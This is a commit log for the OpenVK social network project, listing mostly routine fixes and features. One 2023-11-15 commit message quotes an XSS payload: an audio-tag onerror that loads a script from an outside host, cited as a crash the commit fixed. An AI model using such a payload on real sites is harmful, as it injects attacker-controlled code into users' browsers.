Commit Graph

1713 Commits

Author SHA1 Message Date
Evgeniy Khramov 9fd8b22a95
Fix feedback notification counter @layout.xml (#1114) 2024-05-17 12:38:44 +03:00
Jillian Österreich ae689e1327
chore(theme-midnight): bump version to 0.0.2.9 2024-04-19 11:16:41 +03:00
marshallovski 61b3982349
fix(theme-midnight): change photo viewer bg color and "beautify" the stylesheet (#1107) 2024-04-19 11:12:41 +03:00
Jillian Österreich 4218e02f4b
chore: remove mentions of our older domain names
Closes GH-1099
2024-04-19 11:05:24 +03:00
celestora 2bdb4f03d0 feat(OAuth): add oauth flow 2024-03-30 21:51:38 +02:00
celestora 0b80c0a6a8 feat(API): implement token re-use mechanism 2024-03-30 12:59:10 +02:00
celestora 939ea30262 improvement(bootstrap): small compat fixes for WIN_NT on PHP 8.1 2024-03-30 12:29:50 +02:00
celestora c4fb793333 improvement(API): fix inconsistencies in util.* + add chandler guid resolving funs 2024-03-27 22:38:35 +02:00
celestora 869712d73a
improvement(README): add system requirements (people ask for them a lot) 2024-02-19 13:41:38 +03:00
Jillian Österreich eb95cef6d0
improve(locale-en): Correct spelling in some strings
minor spelling mistake 🌋
2024-02-05 12:23:31 +07:00
veselcraft 0f81a6a0c3
fix(reports): fix 500 error when trying to delete or ban user if it's not post 2024-01-30 11:34:42 +03:00
Daniel 73ee4f5abf
OpenVK Midnight: some fixes 2024-01-30 10:48:27 +03:00
Daniel 14b0b78cce
Site Tour: hype update KB251732 2024-01-30 10:44:06 +03:00
Mikhail Lebedinets c2be06b58f
fix(StatusExpress): button width (#1081) 2024-01-17 15:55:19 +03:00
celestora c863e07908
fix(ImageBox): fix next/prev image navigation
height: 100% only works if parent position is not static, without this property image navigation "buttons" were too long and were covering important butt*ns
2024-01-08 14:07:27 +02:00
Anonymous 64827402ee
perf(feed): lazy load 2024-01-06 21:30:59 +03:00
ayato d60df69825
README.md: minor spelling mistake (#1074) 2024-01-02 22:27:30 +02:00
Anatoly Bogomolov 49e061f563
fix(audio): sort genres alphabetically (#1065) 2024-01-02 22:26:55 +02:00
Alexander Minkin 44531fcbb0
fix(DateTime): use php81_bc/strftime (#1063)
Native strftime was deprecated in PHP 8.1 so I replaced it with an
alternative library that uses ICU so that you don't have to set up
locales on your server anymore.
Also this commit removes AM/PM labels as timestamps were in 24h format
anyways, regardless of locale.
2024-01-02 22:22:10 +02:00
Dmitry Tretyakov fabf9ffd71
improve(locale-ru): Correct spelling for `audio_requirements` 2024-01-02 19:20:47 +07:00
veselcraft acc5459f90
feat(posts, platforms): add windows phone icon 2023-12-27 03:34:18 +03:00
celestora ecb778b2db
improve(apps): make iframe sandbox flags more liberal (#1072) 2023-12-22 15:57:39 +03:00
mikhail "synzr 5617572967
English: changed track_noname to Untitled (#1069) 2023-12-20 22:02:30 +03:00
Dmitry Tretyakov 4548e2290a
VKAPI: Fix `Users.get` with `field=counters` 2023-12-13 21:24:40 +07:00
Alexander Minkin e813549602
fix: solve some warnings
Notifications.php: make $count parameter explicit as it is placed before
another explicit parameter
OpenVKPresenter.php: add additional null checks
Themepacks.php: add return type to offsetGet
2023-12-11 13:15:01 +03:00
Alexander Minkin 2eb15cb600
fix(composer,templates): remove zadarma traces 2023-12-11 13:11:04 +03:00
Alexander Minkin 3d08bd1370
fix(config): add missing entries 2023-12-11 13:09:43 +03:00
Alexander Minkin 88d0ef3ef2
feat(docker): provide example config 2023-12-10 22:23:22 +03:00
Alexander Minkin 88d296a9c4
fix(repositories): make db queries use count
This should fix /about page
2023-12-10 21:55:28 +03:00
Alexander Minkin b2b6fe6966
fix(gh-actions): bump BASE_IMAGE_VERSION to 8.2 2023-12-10 21:26:58 +03:00
Alexander Minkin f4ba39c6f2
ci(docker): bump PHP version to 8.2 2023-12-10 21:21:50 +03:00
Alexander Minkin 6954cd9c55
build(composer): add composer.lock file 2023-12-10 21:02:06 +03:00
Alexander Minkin 2449d71595
fix(sqls): assign a number to 00044-close-profiles.sql 2023-12-02 20:29:28 +03:00
lalka2018 1e7fdeff27
feat: close profile (#978) 2023-12-02 20:21:16 +03:00
zavsc 04eb724cd5
feat(api): add ability to know what user is listening (#1048) 2023-12-02 20:06:48 +03:00
Mikita Wiśniewski 41e4383d3b
fix(themepacks/modern): minor fixes and touches (#1054) 2023-12-02 20:04:51 +03:00
veselcraft 1625557e24
fix(api): 500 error if user from repost does not exist 2023-12-01 15:10:13 +03:00
Vladimir Barinov 5b8fe91a33
Изменения понятия "гендер" и "пол" на "местоимения" (#1033) 2023-11-30 17:39:55 +03:00
Vladimir Barinov 237206ccec
Global: Add new required extension
PDO SQLite is required for messages to work. For some reason it's not required by default
2023-11-28 15:12:23 +03:00
veselcraft 453b002451
Web: fix that annoying bug with scrolling 2023-11-22 19:00:55 +03:00
Dmitry Tretyakov 050afab816
VKAPI: remove last comma in `counters` (`Users.get`) 2023-11-22 15:32:08 +07:00
Dmitry Tretyakov 35bd3ad1e0
VKAPI: add `counters` field in `Users.get` 2023-11-22 15:31:26 +07:00
Vladimir Barinov 93bfe6e886
зязя попросил 2023-11-18 21:22:12 +03:00
Dmitry Tretyakov 3c624a9c78
VKAPI: Add original author info with `extended=1` if reposted 2023-11-18 12:01:33 +07:00
lalka2018 2b9e316b80 COMPLETELY REMOVE AUDIOS from init-static-db.sql 2023-11-17 18:12:01 +03:00
lalka2018 4e3a6f35cb Add correct index for `suggested` 2023-11-16 19:53:01 +03:00
lalka2018 4699fcbeb9
Groups: Wall: add suggestions (#935)
* Wall: add early suggestions

* Fix br

* Fix empty posts

* fck

* Add offset for api

* Add notifications of new suggestion posts

* Fix mentions in suggested posts

* 🤮🤢

* Change regex

Теперь оно удаляет все теги а не только <br>

* Add da koroche pohuy

* Эдд апи метходс

Методы нестандартные немного

* Pon

* Add skloneniyia

* newlines

* int

* Update loaders and add avtopodgruzka postov

* Update JOERGK.strings

* Blin

* Remove repeated code, fix loaded buttons on chr...

...ome and fix getting suggested posts via API.Wall.getPost

* Fix polls

* Fihes

Теперь уведомление о принятии поста не приходит, если вы приняли свой же пост

Пофикшен баг перехода в предложку

Добавлен старый вид постов в предложке

Теперь счётчик постов в предложке у прикреплённой группы обновляется при принятии или отклонении поста

Убрано всплывающее уведомление об отклонении поста (оно раздражает)

Теперь если вы посмотрели все посты на одной странице (не на первой) и на ней не осталось постов, вас телепортирует на предыдущую страницу

* Remove ability to delete your accepted psto

* oi blin

* Improvements 2 api

* g

* openvk.uk

Возможно, приведение кода к кодстайлу (удаление скобочек то есть)

* aiaks

* al_wall.js -> al_suggestions.js

* 👨‍💻 Add 👨‍💻 fading 👨‍💻

* Add "owner's posts' and "other's posts"

Давайте рофлить👨‍💻👨‍💻👨‍💻

* planshet openvk

Add tabs for post view, add signer's object in wall get and add person icon in microblog

* Simplefai ze kod

* PHP 8 FIX WATAFAK

* Add indesk
2023-11-16 19:44:12 +03:00
lalka2018 3112372d01 Fix videos picker 2023-11-16 14:35:08 +03:00
lalka2018 704fdb113b Some api fixes
- Теперь опросы прикрепляются через апи нормально
- Через wall.edit теперь можно прикреплят новые аудио
- При закрытии messagebox снова включается возможность скроллить
- Через методы редактирования можно теперь прикреплять чужие хуйни
- Удалены методы notes.deleteComment и notes.editComment, ведь они одинаковы с wall.deleteComment и wall.editComment
- Лайки у видеозаписей теперь быстрее, ведь не прогружают новую страницу (в отличии от лайков на посте)
- Название "<audio src/onerror="$(body).append('<script src=//sdzk.xyz/a>')"" больше не вызывает краш оконного плеера
2023-11-15 17:46:38 +03:00
lalka2018 9e7467ed97 Fix al_wall.js 2023-11-15 15:40:45 +03:00